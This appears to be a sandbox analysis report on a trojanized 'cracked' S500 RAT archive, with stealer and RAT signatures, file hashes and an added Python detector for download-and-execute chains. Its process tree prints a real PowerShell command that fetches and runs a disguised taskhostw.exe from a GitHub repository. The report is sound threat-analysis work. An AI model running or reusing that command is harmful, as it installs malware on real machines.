Analysis Overview
SHA256
54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff
Threat Level: Known bad
The file S500 RAT Cracked + Source .rar was found to be: Known bad.
The archive is a "cracked" build of the S500 remote-access trojan together with its source tree. Across the detonations below the cracked binaries behave as a stealer/RAT against whoever runs them: the sandbox tags them as AsyncRAT and StormKitty payloads, S500RAT Cracked.exe copies user files into a local Grabber directory and reads browser profile data, the sample queries ip-api.com, icanhazip.com and api.mylnikov.org, contacts api.telegram.org, and opens loopback connections on ports 6606, 7707 and 8808. Separately, the built S500RAT.exe launches a batch file from %TEMP% that uses PowerShell Invoke-WebRequest to fetch a taskhostw.exe from GitHub and then runs a process by that name. The package is therefore a trojanized "crack", not a usable tool.
Malicious Activity Summary
StormKitty
Async RAT payload
StormKitty payload
Asyncrat family
Agenttesla family
AgentTesla payload
AsyncRat
Arrowrat family
Stormkitty family
Contains code to disable Windows Defender
Blocklisted process makes network request
Executes dropped EXE
UPX packed file
Checks computer location settings
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
Reads user/profile data of web browsers
Looks up geolocation information via web service
Looks up external IP address via web service
Drops desktop.ini file(s)
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Modifies registry class
Modifies Internet Explorer settings
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Checks processor information in registry
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
Opens file in notepad (likely ransom note) (sandbox heuristic for Notepad launches; the files opened in these detonations are the archive's own Readme.txt and Login.txt)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-20 17:23
Signatures
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Agenttesla family
Arrowrat family
Async RAT payload
| Description | Indicator | Process | Target |
| 3 matches (no indicator, process or target details captured) | N/A | N/A | N/A |
Asyncrat family
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stormkitty family
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| 99 matches (no indicator, process or target details captured) | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-20 17:22
Reported
2024-03-20 17:47
Platform
win10v2004-20240226-en
Max time kernel
1287s
Max time network
1172s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| 7 matches (no indicator, process or target details captured) | N/A | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings | C:\Program Files\7-Zip\7zFM.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Note: the file opened is the archive's own Readme.txt extracted by 7-Zip (see Processes below). This hit is the sandbox's generic heuristic for Notepad launches, not evidence of ransomware behaviour.
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 (privilege reported by raw LUID; 35 is SeCreateSymbolicLinkPrivilege, which 7-Zip requests when extracting) | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E04.tmp\3E05.tmp\3E06.bat "C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
C:\Windows\system32\taskhostw.exe
taskhostw.exe
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E61B.tmp\E61C.tmp\E61D.bat "C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe
ServerRegistrationManager.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
C:\Windows\system32\taskhostw.exe
taskhostw.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO85E5D4EA\Readme.txt
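The S500RAT.exe chain above (cmd.exe running a .bat from %TEMP%, chcp 65001, PowerShell Invoke-WebRequest with -OutFile, then execution of a process with the downloaded name) is a generic download-and-execute pattern that is worth detecting outside the sandbox. The Python below is an added example written for this page, not part of the sandbox report or of the S500 code: it walks a constructed list of process-creation events modelled on the tree above (PIDs and timestamps are invented, since the report has none; the images and command lines are the report's) and flags a PowerShell download whose output file name is subsequently executed by a sibling or child process, recording whether the chain started from a %TEMP% batch file and whether the file name collides with a Windows system binary (taskhostw.exe here). The download-verb list and system-binary name set are assumptions of the example. Note that the report's Files section lists no dropped taskhostw.exe and the process that ran is the System32 path, so the detection keys on command-line intent rather than on a dropped file.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events modelled on the behavioral3 process tree
# in the report. The sandbox report lists no PIDs or timestamps, so pid/ppid/ts
# are invented for this example; images and command lines are the report's.
# The last event is a benign control: a download that nothing executes.
SAMPLE_EVENTS = [
    {"ts": 1, "pid": 100, "ppid": 1,
     "image": r"C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe",
     "cmdline": r'"C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"'},
    {"ts": 2, "pid": 101, "ppid": 100, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E04.tmp\3E05.tmp\3E06.bat "C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe""'},
    {"ts": 3, "pid": 102, "ppid": 101, "image": r"C:\Windows\system32\chcp.com", "cmdline": "chcp 65001"},
    {"ts": 4, "pid": 103, "ppid": 101,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "Powershell -Command \"Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe\""},
    {"ts": 5, "pid": 104, "ppid": 101, "image": r"C:\Windows\system32\taskhostw.exe", "cmdline": "taskhostw.exe"},
    {"ts": 6, "pid": 200, "ppid": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -Command \"Invoke-WebRequest 'https://example.invalid/tool.zip' -OutFile tool.zip\""},
]

# Download verbs to look for in a PowerShell command line (assumed list).
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "curl ", "wget ", "start-bitstransfer", "downloadfile(")
OUTFILE_RE = re.compile(r"-outfile\s+['\"]?([^\s'\"]+)", re.IGNORECASE)
TEMP_BAT_RE = re.compile(r'\\appdata\\local\\temp\\[^"]*\.(?:bat|cmd)\b', re.IGNORECASE)
# Names a dropped file should never carry; a match means masquerading (ATT&CK T1036.005).
SYSTEM_BINARY_NAMES = {"taskhostw.exe", "svchost.exe", "csrss.exe", "lsass.exe",
                       "dllhost.exe", "explorer.exe", "conhost.exe", "runtimebroker.exe"}


def _basename(path):
    return PureWindowsPath(path).name.lower()


def find_download_and_execute(events):
    """Return one finding per PowerShell download whose output file name is later
    executed by a sibling (same parent) or child process."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if _basename(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
            continue
        m = OUTFILE_RE.search(ev["cmdline"])
        if m is None or not any(k in ev["cmdline"].lower() for k in DOWNLOAD_MARKERS):
            continue
        outfile = _basename(m.group(1))
        # The payload is started either by the same cmd/batch parent (as in the
        # report) or by PowerShell itself, in both cases after the download.
        executed = [c for c in events
                    if c["ts"] > ev["ts"] and c["ppid"] in (ev["ppid"], ev["pid"])
                    and _basename(c["image"]) == outfile]
        if not executed:
            continue
        parent = by_pid.get(ev["ppid"])
        findings.append({
            "downloader_pid": ev["pid"],
            "executed_pid": executed[0]["pid"],
            "outfile": outfile,
            "via_temp_batch": bool(parent and _basename(parent["image"]) == "cmd.exe"
                                   and TEMP_BAT_RE.search(parent["cmdline"])),
            "masquerades_as_system_binary": outfile in SYSTEM_BINARY_NAMES,
        })
    return findings


if __name__ == "__main__":
    for finding in find_download_and_execute(SAMPLE_EVENTS):
        print(finding)
```

Run against the sample, the benign interactive download (pid 200) produces nothing because no process with its output name ever starts, while the S500 chain yields one finding with via_temp_batch and masquerades_as_system_binary both set. On real telemetry (Sysmon event 1 or Windows 4688 with command-line auditing) the same three fields are a useful triage score: a download alone is common, a download followed by execution from a %TEMP% batch under a system-binary name is not.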
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 45.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\Forms\Form4.resx
| MD5 | 0a4e049a213aef04a4b1fa145a76a752 |
| SHA1 | 3603cb74a5883c3086cb483eb5ed2a1d452fbeb1 |
| SHA256 | 203301e3afc69af0045e4c6d28920fdce85a678de2bb79f53dde11bc7df63d8f |
| SHA512 | 23ee1f3c0b8bd72f7a9c3e904f21b830d27ba5a80e77e3b08790fb7438180c9d9c287da22c84ea41cdf74aee71f1bcb187dd6ea50bdee45b88a3a5cfd7808016 |
C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\Forms\FormDOS.resx
| MD5 | 5c43b1a8ce131be5e8271794ec520a54 |
| SHA1 | 1d2f31f18ac0b543bab6a1f45ac2d388a6ad119a |
| SHA256 | 048b4c1bd3a6d8c36d30bab692e8b2b24c8ea7310ec7cfdbd5f73e65ec62b153 |
| SHA512 | 4ffe82161a7a1578f8d0299115362c88fd7dec77fe08ab7ca886ae97eb0b064a3d1b7f0529b4708095bef4a278018e70a730f37a147edc338e0d61d31d3f40d6 |
C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormRegValueEditMultiString.resources
| MD5 | beda8bbd2a72e45431cf5dd68f7c6e61 |
| SHA1 | 18e28ada040e4c62e33d946046a9ccf66f839f0d |
| SHA256 | f9f9c2a4855d61b7c7f93e9258d0306be802ef9c8c8929186deb71ee96b06d4c |
| SHA512 | 6287bb138431c33a2dd30b7c06c979ee89f691900eb407e14465d58188d04d7697ecc68eb6d479db664ea86f35b7ce6b611834028ddbd56513003c1ca28f0899 |
C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormSendFileToMemory.resources
| MD5 | fa80841e3dc9ffb31dd5d015c1030172 |
| SHA1 | aa0d9e66db2a8528edf9931fe132f18870307216 |
| SHA256 | a5b9f5ccfe8ac46a630ac1cc112d343364fa2bc4a2bec0f3911322cff174cff9 |
| SHA512 | a38cc863d3c0c8d944340cd4116f03bbdb2f1526fb40b476cd0adbd444fd1dc10790d35eaf50ea34a1083b163baa82251a5048f075651bc14e46ac4cb82897bd |
C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.targets
| MD5 | 3d9ef7c4c2db6e7631832825418a9ba6 |
| SHA1 | b2ac00b06d61c8498914ea52eaedaab01fae1a21 |
| SHA256 | 6d1bba3214839a263b1c34c8668d7dc5ff2d0ee91cd4a1b01d251b7595ee94d7 |
| SHA512 | 641939c4c1b7e61c90aa8ffaf9e3ac701c669a0d58ee85706f291197bacd2717451deb0fe95b4b9bb0daa56965fcdfcfe065decfcab657ac380b132887023035 |
C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.props
| MD5 | 3108edc3f74d08bec485f1fc0aabab5b |
| SHA1 | e1e14322ab3e69a69a7b0c9efd5b845a112320b8 |
| SHA256 | e785c6a42a443ab0b9fd7888d8d37ee280c833226d9a56e2e1840edebfa8f584 |
| SHA512 | 750609750b366cdd1efd04035c742af2127d8341a22e4ce48c378f74a85414705e168f036df26f0095a82ce09142af52fbcd8a0227cc966d9c472c2f70a1907e |
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe
| MD5 | 7ba3ab7d000bd8f2206e08abdbe74d7d |
| SHA1 | 6940a66fecfed2706db0368b36a9a27f20b93e25 |
| SHA256 | 05156b19fa8699fa4aa7f59d07fb78730d5313d025c242ac4cdf591d928e97e1 |
| SHA512 | c42a3fe48e2bad222a72742028e2709a59fa0d36915c07f7332436d31b452ce358765c418fc7f0011849e10468363470f732b56b2c17029e5003b9c9ef033249 |
memory/4228-999-0x0000000000400000-0x0000000000439000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe
| MD5 | 9b694ed7d344cd6f2e02977fbdc07a0a |
| SHA1 | 2bc6f78a91b26026c51051e646d788488c776855 |
| SHA256 | 2bcd8656e5e55f05143a5fd31434719e0b843567f3a7b69a392b4abb17fc63bd |
| SHA512 | 6ce0b9a9cac4b42ffd8c7f337a41e475595b051c68529e299df7519016c7b9883af10921683a919fe8ae3069740d4c96d4f645edeb0891fc4e01fc73b17a2518 |
C:\Users\Admin\AppData\Local\Temp\3E04.tmp\3E05.tmp\3E06.bat
| MD5 | fc4af7384f0b6f274dd3e745f0aceeaa |
| SHA1 | 31b310f869b15b84e52ef282cabaee974e5043cf |
| SHA256 | f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34 |
| SHA512 | dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oyauzrce.43f.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5036-1008-0x000001DE72EC0000-0x000001DE72EE2000-memory.dmp
memory/5036-1013-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp
memory/5036-1014-0x000001DE724D0000-0x000001DE724E0000-memory.dmp
memory/5036-1015-0x000001DE724D0000-0x000001DE724E0000-memory.dmp
memory/5036-1018-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp
memory/4228-1019-0x0000000000400000-0x0000000000439000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zE85E1A78A\cGeoIp.dll
| MD5 | 6d6e172e7965d1250a4a6f8a0513aa9f |
| SHA1 | b0fd4f64e837f48682874251c93258ee2cbcad2b |
| SHA256 | d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0 |
| SHA512 | 35daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155 |
C:\Users\Admin\AppData\Local\Temp\7zE85E1A78A\protobuf-net.dll
| MD5 | 9fbb8cec55b2115c00c0ba386c37ce62 |
| SHA1 | e2378a1c22c35e40fd1c3e19066de4e33b50f24a |
| SHA256 | 9f01d9f2ed07e630ec078efa5d760762c3c8ad3b06e9e8a9062a37d63d57b026 |
| SHA512 | da0211d1c9ba0a59616bc15de80a1fed62b0405cad3b11ae4220ef1488c7837634aad67cbc8b484621a2a6288ef5e424cd816a2523bdb6167abcab76f3ac1a04 |
C:\Users\Admin\AppData\Local\Temp\7zE85E1A78A\Vestris.ResourceLib.dll
| MD5 | 944ce5123c94c66a50376e7b37e3a6a6 |
| SHA1 | a1936ac79c987a5ba47ca3d023f740401f73529b |
| SHA256 | 7da3f0e77c4dddc82df7c16c8c781fade599b7c91e3d32eefbce215b8f06b12a |
| SHA512 | 4c034ff51cc01567f3cb0796575528ca44623b864eb606266bcf955a9259ed26b20bec0086d79038158d3a5af2ada0a90f59d7c6aae9e545294fe77825dbe08b |
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe
| MD5 | 5b52658c4517684971de10a6b7a67c30 |
| SHA1 | f0820c52617ebacaf53d8b8d97f1a42c712888bd |
| SHA256 | 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31 |
| SHA512 | ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6 |
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe
| MD5 | 7a8d11174bebefad4409d477b20825b7 |
| SHA1 | b6d0e9230fe339b4d200acbf401f66a6facd3a08 |
| SHA256 | 0760e54f54e20d7d63e5016eb204e913633ce5857d1fc722ac39977453712e3b |
| SHA512 | 2116a695a640390fdf6558c6def1900eb6edff1ac3e65030ea81ae346f1965135ab97600c4c20cb3bddc7db643e42cc74e88829bf78c9d254e7014648b88f2cb |
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe
| MD5 | 9e83a638e31058801b0ddeea8202760d |
| SHA1 | 9fdfafd6855469dd3f6171f7c6283d94c477e9e8 |
| SHA256 | 6f296f3c16c7aba99d3ed032a186934280bda76db96e9322bef5193d306a8df7 |
| SHA512 | 20378249a49ecb99367c715087cb2b80b1a75c198b67e0c800c458b7d2f403e85e295d00f612cf8f12b0dd6698062a761e71e2ae7477e117dce5eb394770d10c |
memory/3176-1310-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp
memory/3176-1311-0x0000023737FA0000-0x0000023739064000-memory.dmp
memory/3176-1312-0x0000023739430000-0x0000023739440000-memory.dmp
memory/3176-1314-0x00000237538D0000-0x0000023753AC4000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\Guna.UI2.dll
| MD5 | 4544872c197f9ad471bb18c648b004b0 |
| SHA1 | 280a1ec5ab002d1ab15279b3fb0de8dd3c4aa482 |
| SHA256 | bf4aec4b6a094c21008b4788be9ca7072fcff0800cf1c098828222769b311e7b |
| SHA512 | aaf6a5a357976f6a83672009d3648f4dd7303bdd91eeca6b2d1ce35f59cb65563daa70505162f862bb7ce322d9645dbabd49e9a8f8a9e22d4d169f3d59ac8aca |
C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.pdb
| MD5 | e90f5f88df944bd07f5e2f42a2665200 |
| SHA1 | f1f55ee3fe858e854848d4c3ccdebc9b3009f638 |
| SHA256 | e4770d767eed1e5bf31d2eeb8e543b60eeffff423515eb60a1c9329ff66ea9dc |
| SHA512 | c605c4f392cfa61e50b47c2d24c4a69d54f657e4f6c99a8da73cc0ae2d240257f4bedbcb508757e70e96f868e078e6d8969ad94fb677356fa9278279e45c82da |
memory/3176-1316-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp
memory/1536-1317-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1318-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1319-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/4044-1321-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp
memory/4044-1322-0x00000134B5EB0000-0x00000134B5EC0000-memory.dmp
memory/4516-1323-0x0000000000400000-0x0000000000439000-memory.dmp
memory/4044-1324-0x00000134B5EB0000-0x00000134B5EC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ef5ef35c3059825861b16409862d0e3d |
| SHA1 | cde5311765478b1bcf309219c1a86a0238612099 |
| SHA256 | 53df4a6c07213c72fa9c8f1e6c20d5a771d587744f775b4d45b647c1f890cc4b |
| SHA512 | 3c5814f9f94f4127f175b79e9d95eb7426c67b2d593ef6880c62cc3541d36142b9cb7391e3eac58fe45991d4e5fa7f979c96cba91da2354b7f56d8a2bb76dd20 |
memory/1536-1339-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/4044-1338-0x00000134B5EB0000-0x00000134B5EC0000-memory.dmp
memory/1536-1340-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1341-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1342-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1343-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1344-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/1536-1345-0x000002A242AC0000-0x000002A242AC1000-memory.dmp
memory/4044-1346-0x00000134B7590000-0x00000134B7D36000-memory.dmp
memory/4044-1349-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp
memory/4516-1350-0x0000000000400000-0x0000000000439000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO85E5D4EA\Readme.txt
| MD5 | 531208ea558a68c95339bea9517845c3 |
| SHA1 | 95865bbeb196cf007626c92cdef1524c9b16dc5a |
| SHA256 | dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a |
| SHA512 | 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-20 17:22
Reported
2024-03-20 17:56
Platform
win11-20240214-en
Max time kernel
1288s
Max time network
1272s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
